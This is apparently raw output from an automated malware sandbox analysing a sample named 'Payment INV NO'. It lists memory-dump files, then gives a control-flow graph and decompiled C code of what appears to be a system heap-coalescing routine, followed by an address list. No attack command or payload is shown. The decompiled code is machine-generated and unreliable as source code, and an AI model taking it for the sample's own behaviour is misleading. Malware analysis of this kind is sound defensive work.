                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: bcdc6ef00b6e9f27bba12c3a3a383f42f44bca1e79020de71895e5a45ddc1e3c
                                                          • Instruction ID: c7ad22e73852d043a6059bf91fbe1d8570fe17efc7fd2b1c3f9e6385c953b680
                                                          • Opcode Fuzzy Hash: bcdc6ef00b6e9f27bba12c3a3a383f42f44bca1e79020de71895e5a45ddc1e3c
                                                          • Instruction Fuzzy Hash: B0E29C70A00619DFDB29CF68C8D0BAAFBF5FF49304F1481A9E945AB386D734A941CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B99BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1672 17b99bf-17b99e3 1673 17b99f5-17b99f8 1672->1673 1674 17b99e5-17b99f3 1672->1674 1676 17b99fb 1673->1676 1674->1673 1675 17b9a48-17b9a4c 1674->1675 1678 17b9a6e-17b9a76 1675->1678 1679 17b9a4e-17b9a68 1675->1679 1677 17b99fe-17b9a07 1676->1677 1683 17b9a29-17b9a37 1677->1683 1684 17b9a09-17b9a23 1677->1684 1681 1801466-1801479 1678->1681 1682 17b9a7c-17b9a8f 1678->1682 1679->1678 1680 1801457-1801461 1679->1680 1680->1678 1687 180159c-18015a5 1681->1687 1688 180147f-1801481 1681->1688 1685 180166a-1801679 1682->1685 1686 17b9a95-17b9a97 1682->1686 1690 17b9a3d-17b9a45 1683->1690 1691 180169c-18016a0 1683->1691 1684->1683 1689 180167e-1801686 1684->1689 1685->1676 1686->1685 1692 17b9a9d-17b9aab 1686->1692 1704 18015ab 1687->1704 1688->1687 1695 1801487-1801495 1688->1695 1693 180168f-1801697 1689->1693 1696 18016a2-18016bc 1691->1696 1697 18016c8-18016cc 1691->1697 1699 17b9aad-17b9ab0 1692->1699 1700 17b9ad7-17b9ae6 1692->1700 1693->1683 1701 18014c0-18014cf 1695->1701 1702 1801497-180149a 1695->1702 1696->1697 1703 18016be-18016c1 1696->1703 1705 18016d2-18016e5 1697->1705 1706 180181b-180182e 1697->1706 1711 17b9ab3-17b9ab6 1699->1711 1714 17b9ae8-17b9aee 1700->1714 1715 17b9b1e-17b9b29 call 17ba229 1700->1715 1707 18014d1-18014dc call 17ba229 1701->1707 1708 18014f2-18014f8 1701->1708 1713 18014a4-18014a7 1702->1713 1703->1697 1720 18015b4-18015c3 call 17ba309 1704->1720 1716 1801808-1801811 1705->1716 1717 18016eb-18016ed 1705->1717 1709 1801834-1801836 1706->1709 1710 1801688-180168d 1706->1710 1707->1708 1754 18014de-18014ed call 17ba309 1707->1754 1708->1704 1726 18014fe-180150e 1708->1726 1709->1710 1723 180183c-180184a 1709->1723 1710->1693 1724 17b9ac9-17b9ad2 call 17bbc04 1711->1724 1725 17b9ab8-17b9abc 1711->1725 1718 18014a9-18014ab 1713->1718 1719 180149c-18014a0 1713->1719 1727 18015c8-18015d5 1714->1727 1728 17b9af4-17b9b19 1714->1728 1715->1714 1748 17b9b2b 1715->1748 1739 1801817 1716->1739 1717->1716 1721 18016f3-1801701 1717->1721 1733 18014b1-18014bb call 17bbc04 1718->1733 1731 18014a2 1719->1731 1732 18014ad-18014b0 1719->1732 1720->1676 1735 1801703-1801706 1721->1735 1736 180172c-180173b 1721->1736 1741 1801875-1801884 1723->1741 1742 180184c-180184f 1723->1742 1724->1700 1743 17b9abe-17b9ac3 1725->1743 1744 17b9ac5-17b9ac8 1725->1744 1745 1801510-1801513 1726->1745 1746 180151b-1801530 call 17ed540 1726->1746 1737 18015d7-18015da 1727->1737 1738 18015df-18015f3 call 17ed540 1727->1738 1728->1677 1731->1713 1732->1733 1733->1701 1751 1801710-1801713 1735->1751 1756 180173d-1801748 call 17ba229 1736->1756 1757 180175e-1801764 1736->1757 1737->1738 1752 18015dc 1737->1752 1738->1728 1782 18015f9-1801604 GetPEB 1738->1782 1739->1706 1760 1801886-1801891 call 17ba229 1741->1760 1761 18018a7-18018ad 1741->1761 1755 1801859-180185c 1742->1755 1743->1711 1744->1724 1745->1746 1758 1801515-1801518 1745->1758 1746->1704 1788 1801532-180153d GetPEB 1746->1788 1748->1720 1764 1801715-1801717 1751->1764 1765 1801708-180170c 1751->1765 1752->1738 1754->1704 1768 1801851-1801855 1755->1768 1769 180185e-1801860 1755->1769 1756->1757 1797 180174a-1801759 call 17ba309 1756->1797 1757->1739 1772 180176a-180177a 1757->1772 1758->1746 1760->1761 1790 1801893-18018a2 call 17ba309 1760->1790 1762 18018b3-18018c3 1761->1762 1763 180194f-1801972 1761->1763 1777 18018d0-18018e5 call 17ed540 1762->1777 1778 18018c5-18018c8 1762->1778 1763->1690 1781 180171d-1801727 call 17bbc04 1764->1781 1779 1801719-180171c 1765->1779 1780 180170e 1765->1780 1784 1801862-1801865 1768->1784 1785 1801857 1768->1785 1786 1801866-1801870 call 17bbc04 1769->1786 1774 1801787-180179c call 17ed540 1772->1774 1775 180177c-180177f 1772->1775 1774->1739 1812 180179e-18017a9 GetPEB 1774->1812 1775->1774 1789 1801781-1801784 1775->1789 1777->1763 1813 18018e7-18018f2 GetPEB 1777->1813 1778->1777 1792 18018ca-18018cd 1778->1792 1779->1781 1780->1751 1781->1736 1795 1801624-1801629 call 179b150 1782->1795 1796 1801606-1801622 GetPEB call 179b150 1782->1796 1784->1786 1785->1755 1786->1741 1799 180155d-1801562 call 179b150 1788->1799 1800 180153f-180155b GetPEB call 179b150 1788->1800 1789->1774 1790->1683 1792->1777 1815 180162e-1801650 call 179b150 GetPEB 1795->1815 1796->1815 1797->1739 1811 1801567-1801589 call 179b150 GetPEB 1799->1811 1800->1811 1811->1704 1829 180158b-180159a 1811->1829 1818 18017c9-18017ce call 179b150 1812->1818 1819 18017ab-18017c7 GetPEB call 179b150 1812->1819 1820 1801912-1801917 call 179b150 1813->1820 1821 18018f4-1801910 GetPEB call 179b150 1813->1821 1815->1728 1834 1801656-1801665 1815->1834 1831 18017d3-18017f5 call 179b150 GetPEB 1818->1831 1819->1831 1833 180191c-180193e call 179b150 GetPEB 1820->1833 1821->1833 1829->1704 1831->1739 1839 18017f7-1801806 1831->1839 1833->1763 1840 1801940-1801948 1833->1840 1834->1728 1839->1739 1840->1763
                                                          C-Code - Quality: 78%
                                                          			E017B99BF(void* __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				void* _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							L0184FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // 0x8
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							L0185A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // 0x10
									_t286 = E017ED540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E0179B150();
										} else {
											E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E0179B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x1886378 = 1;
											asm("int3");
											 *0x1886378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E017BA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E017BA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // 0x8
							E017BBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // 0x8
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						L0185A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E017BA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E017BA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // 0x10
							_t262 = E017ED540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E0179B150();
								} else {
									E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E0179B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x1886378 = 1;
									asm("int3");
									 *0x1886378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										L0184FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // 0x8
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										L0185A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // 0x10
												_t197 = E017ED540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E0179B150();
													} else {
														E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E0179B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x1886378 = 1;
														asm("int3");
														 *0x1886378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E017BA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E017BA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // 0x8
											E017BBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // 0x8
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										L0185A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // 0x10
												_t222 = E017ED540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E0179B150();
													} else {
														E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E0179B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x1886378 = 1;
														asm("int3");
														 *0x1886378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E017BA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E017BA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // 0x8
											E017BBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E017BBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                          0x017b99ca
                                                          0x017b99cc
                                                          0x017b99df
                                                          0x017b99e3
                                                          0x017b99f8
                                                          0x017b99fb
                                                          0x017b99fb
                                                          0x00000000
                                                          0x017b9a48
                                                          0x017b9a48
                                                          0x017b9a4c
                                                          0x017b9a51
                                                          0x017b9a55
                                                          0x017b9a61
                                                          0x017b9a66
                                                          0x017b9a68
                                                          0x01801457
                                                          0x0180145c
                                                          0x0180145c
                                                          0x017b9a68
                                                          0x017b9a6e
                                                          0x017b9a71
                                                          0x017b9a74
                                                          0x017b9a76
                                                          0x01801466
                                                          0x01801469
                                                          0x01801469
                                                          0x0180146c
                                                          0x0180146e
                                                          0x01801471
                                                          0x01801474
                                                          0x01801477
                                                          0x01801479
                                                          0x0180159c
                                                          0x0180159c
                                                          0x0180159d
                                                          0x018015a6
                                                          0x018015ab
                                                          0x018015ab
                                                          0x00000000
                                                          0x018015ab
                                                          0x0180147f
                                                          0x01801481
                                                          0x00000000
                                                          0x00000000
                                                          0x0180148a
                                                          0x0180148d
                                                          0x01801493
                                                          0x01801495
                                                          0x018014c0
                                                          0x018014c0
                                                          0x018014c3
                                                          0x018014c6
                                                          0x018014c8
                                                          0x018014cb
                                                          0x018014cf
                                                          0x018014f2
                                                          0x018014f2
                                                          0x018014f5
                                                          0x018014f8
                                                          0x01801501
                                                          0x01801508
                                                          0x0180150b
                                                          0x0180150e
                                                          0x01801510
                                                          0x01801513
                                                          0x01801515
                                                          0x01801515
                                                          0x01801518
                                                          0x01801518
                                                          0x01801513
                                                          0x01801521
                                                          0x01801525
                                                          0x0180152a
                                                          0x0180152d
                                                          0x01801530
                                                          0x01801532
                                                          0x01801539
                                                          0x0180153d
                                                          0x0180155d
                                                          0x01801562
                                                          0x0180153f
                                                          0x01801555
                                                          0x0180155a
                                                          0x01801570
                                                          0x01801577
                                                          0x0180157c
                                                          0x01801582
                                                          0x01801585
                                                          0x01801589
                                                          0x0180158b
                                                          0x01801592
                                                          0x01801593
                                                          0x01801593
                                                          0x01801589
                                                          0x01801530
                                                          0x00000000
                                                          0x018014f8
                                                          0x018014d5
                                                          0x018014da
                                                          0x018014dc
                                                          0x00000000
                                                          0x018014de
                                                          0x018014e8
                                                          0x00000000
                                                          0x018014e8
                                                          0x01801497
                                                          0x01801497
                                                          0x018014a4
                                                          0x018014a4
                                                          0x018014a7
                                                          0x018014a9
                                                          0x018014ab
                                                          0x018014ab
                                                          0x0180149c
                                                          0x0180149e
                                                          0x018014a0
                                                          0x018014b0
                                                          0x018014b0
                                                          0x00000000
                                                          0x018014a2
                                                          0x018014a2
                                                          0x00000000
                                                          0x018014a2
                                                          0x018014a0
                                                          0x018014b3
                                                          0x018014bb
                                                          0x00000000
                                                          0x018014bb
                                                          0x01801495
                                                          0x017b9a7c
                                                          0x017b9a7c
                                                          0x017b9a7f
                                                          0x017b9a7f
                                                          0x017b9a82
                                                          0x017b9a84
                                                          0x017b9a87
                                                          0x017b9a8a
                                                          0x017b9a8d
                                                          0x017b9a8f
                                                          0x0180166a
                                                          0x0180166a
                                                          0x0180166b
                                                          0x01801674
                                                          0x00000000
                                                          0x01801674
                                                          0x017b9a95
                                                          0x017b9a97
                                                          0x00000000
                                                          0x00000000
                                                          0x017b9aa0
                                                          0x017b9aa3
                                                          0x017b9aa9
                                                          0x017b9aab
                                                          0x017b9ad7
                                                          0x017b9ad7
                                                          0x017b9ada
                                                          0x017b9add
                                                          0x017b9adf
                                                          0x017b9ae2
                                                          0x017b9ae6
                                                          0x017b9b22
                                                          0x017b9b27
